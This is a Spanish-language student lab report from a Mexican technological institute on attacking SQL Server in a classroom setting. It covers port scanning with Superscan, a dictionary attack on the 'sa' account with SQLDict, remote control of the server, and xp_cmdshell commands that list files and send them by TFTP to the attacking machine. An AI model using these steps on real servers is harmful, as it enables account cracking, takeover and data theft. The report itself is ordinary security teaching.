Este documento describe cómo realizar un ataque de infiltración a un servidor SQL mediante el uso de herramientas como Superscan para identificar el puerto TCP abierto, SQLDict para encontrar la contraseña de la cuenta "sa" usando un ataque por diccionario, y Management Studio para conectarse de forma remota al servidor y controlarlo. También incluye instrucciones para instalar un servidor TFTP y usar xp_cmdshell para buscar y transferir archivos del servidor hacia la computadora atacante.
1. Av. Tecnológico No. 2, Col. Centro, C.P. 76800
San Juan del Río, Qro. Conmutador: (01) 427 27 2 85 46, 427 27 2 41 18 Ext. 123
www.itsanjuan.edu.mx
TECNOLÓGICO NACIONAL DE MÉXICO
Instituto Tecnológico de San Juan del Río
Instituto Tecnológico de San Juan del Río
PRÁCTICA 1:
SQL Server
P R E S E N T A:
Ruiz Arrazola María del Carmen 12590172
P R O F E S O R (A):
Rojo López Ariopajita
San Juan del Río, Qro., Abril de 2015
2. Av. Tecnológico No. 2, Col. Centro, C.P. 76800
San Juan del Río, Qro. Conmutador: (01) 427 27 2 85 46, 427 27 2 41 18 Ext. 123
www.itsanjuan.edu.mx
SQL Server
Objetivos
Identificar la presencia de un servidor SQL Server mediante el uso de software de scanner
de puertos.
Efectuar un ataque por diccionario para encontrar la contraseña de la cuenta “sa”.
Conectarse y controlar en forma remota el servidor.
Instalar un servidor TFTP en la computadora atacante.
Ejecutar comandos del sistema operativo desde SQL Server.
Introducción:
Basado en pruebas de infiltración reales que hemos efectuado sobre nuestros clientes desde
internet. La metodología también es muy similar a la usada para hackear a Microsoft cuando le
robaron parte del código fuente de Windows XP. En este incidente, uno de los programadores de
bases de datos tenía una contraseña sencilla en su equipo, que fue explotada por los atacantes como
se describe a continuación.
Material y equipo necesario
1Computadora con windows
Conectar a la red de internet
Metodología
Fase 1.
En este ejercicio, se instalará y ejecutará el software Superscan para identificar el puerto TCP
abierto que indica la presencia de un servidor SQL activo en la red.
1-Instalar superscan.exe
3. Av. Tecnológico No. 2, Col. Centro, C.P. 76800
San Juan del Río, Qro. Conmutador: (01) 427 27 2 85 46, 427 27 2 41 18 Ext. 123
www.itsanjuan.edu.mx
TECNOLÓGICO NACIONAL DE MÉXICO
Instituto Tecnológico de San Juan del Río
2.- Ejecutar superscan y anotar la direccíon del servidor mysql 127.0.0.1
Esta dirección debe ser la misma en los campos IP Start y Stop.
En Scan Type, seleccione All list ports from 1-5000.
3.- Iniciar el SCANNER.
4.- Comprobar que el scanner identifica correctamente el puerto 1433.
4. Av. Tecnológico No. 2, Col. Centro, C.P. 76800
San Juan del Río, Qro. Conmutador: (01) 427 27 2 85 46, 427 27 2 41 18 Ext. 123
www.itsanjuan.edu.mx
TECNOLÓGICO NACIONAL DE MÉXICO
Instituto Tecnológico de San Juan del Río
Fase 2.
En este ejercicio, se utilizará la herramienta SQLDict, montando un ataque por diccionario para
encontrar la contraseña de acceso de la cuenta administrativa “sa”.
1.- Ejecute el programa sqldict.exe.
2.-En el campo Target server IP, introduzca 127.0.0.1
3.-En el campo Target Account, asegúrese que se encuentra sa por default.
4.-Seleccione Load Password File
5.-Navegue a su USB, localice y seleccione el archivo passwords.txt.
5. Av. Tecnológico No. 2, Col. Centro, C.P. 76800
San Juan del Río, Qro. Conmutador: (01) 427 27 2 85 46, 427 27 2 41 18 Ext. 123
www.itsanjuan.edu.mx
TECNOLÓGICO NACIONAL DE MÉXICO
Instituto Tecnológico de San Juan del Río
Fase 3.
En este ejercicio, se usara las herramientas administrativas Management Studio para conectarse a
un servidor y, aprovechando la existencia de una cuenta de login que se instala por default, obtener
el control total del servidor de bases de datos, en forma remota y con privilegios administrativos.
Tarea Pasos Detallados
1. Configurar la herramienta
Enterprise Manager,
conectarse al servidor y
controlarlo en forma remota.
a. Ejecute la herramienta administrativa Management
Studio en el menú Start | Programs | Microsoft
SQL Server 2005 | SQL Server Management
Studio Express
b. En Nombre de servidor, introduzca 192.168.1.100
c. En Autenticación, seleccione Autenticación de
SQL Server. Introduzca la cuenta sa, con la
contraseña que crackeo en el ejercicio anterior. Haga
click en Conectar.
Fase 4.
En este ejercicio, se instalará un servidor TFTP en la computadora atacante para permitir la
recepción y envío de archivos sin autenticación. Este software es necesario debido a que el sistema
operativo Windows contiene un cliente TFTP, pero no el componente servidor.
Tarea Pasos Detallados
1. Instalar un servidor TFTP a. Inserte la memoria USB.
b. Abra el explorador de Windows, y navegue a la
ubicación del software TFTP Server:
Carpeta HERRAMIENTAS SQL
c. Ejecute el software instalador de TFTP Server,
SolarWinds-TFTP-Server.exe, aceptando las
opciones por default que presenta el asistente. Si le
solicita el CD de instalación de Microsoft Office,
presione Cancelar.
d. En la opción File – Configure, seleccione la pestaña
Security, activando la opción “Transmit and
Receive files”. Presione “OK”.
6. Av. Tecnológico No. 2, Col. Centro, C.P. 76800
San Juan del Río, Qro. Conmutador: (01) 427 27 2 85 46, 427 27 2 41 18 Ext. 123
www.itsanjuan.edu.mx
TECNOLÓGICO NACIONAL DE MÉXICO
Instituto Tecnológico de San Juan del Río
Fase 5.
En este ejercicio, se empleará la herramienta administrativa Query Analizer para conectarse al
servidor remoto y ejecutar comandos del sistema operativo para navegar el disco duro. Este
escenario simula la presencia de un archivo en el servidor que nos interesa encontrar y transferir
hacia la computadora atacante.
Tarea Pasos Detallados
1. Conectarse al servidor
remoto
a. En SQL Server Management Studio, selecciona
Nueva consulta.
2. Ejecutar el extended stored
procedure xp_cmdshell para
buscar y transferir un
archivo hacia el hacker
a. En la ventana de consultas, introduzca y ejecute el
siguiente comando para localizar cualquier archivo
de texto que usaremos como ejemplo.
xp_cmdshell ‘dir c:*.txt /s’
b. Active el servidor TFTP en la computadora atacante:
menú Start | Programs | SolarWinds 2001
Standard Edition | File Transfer | TFTP Server.
c. Transfiera el archivo encontrado hacia el equipo
cliente, ejecutando el siguiente stored procedure:
xp_cmdshell ‘tftp –i 192.168.1.# PUT path’
Sustituya # por el número de estudiante que usted tiene
asignado. Sustituya la palabra path por la ruta completa
del archivo encontrado en el punto “a”. Si la ruta
contiene espacios en blanco, necesita incluirla entre
comillas “ ”.
Por ejemplo, si el archivo que desea transferir es
c:program filestest.txt, ejecute:
xp_cmdshell ‘tftp -i 192.168.1.# PUT “c:program filestest.txt”’
d. Verifique que el archive se transfirió hacia la
computadora atacante, revisando el contenido del
directorio c:TFTP-root (el directorio que se
configure por default para enviar y recibir archives
por TFTP).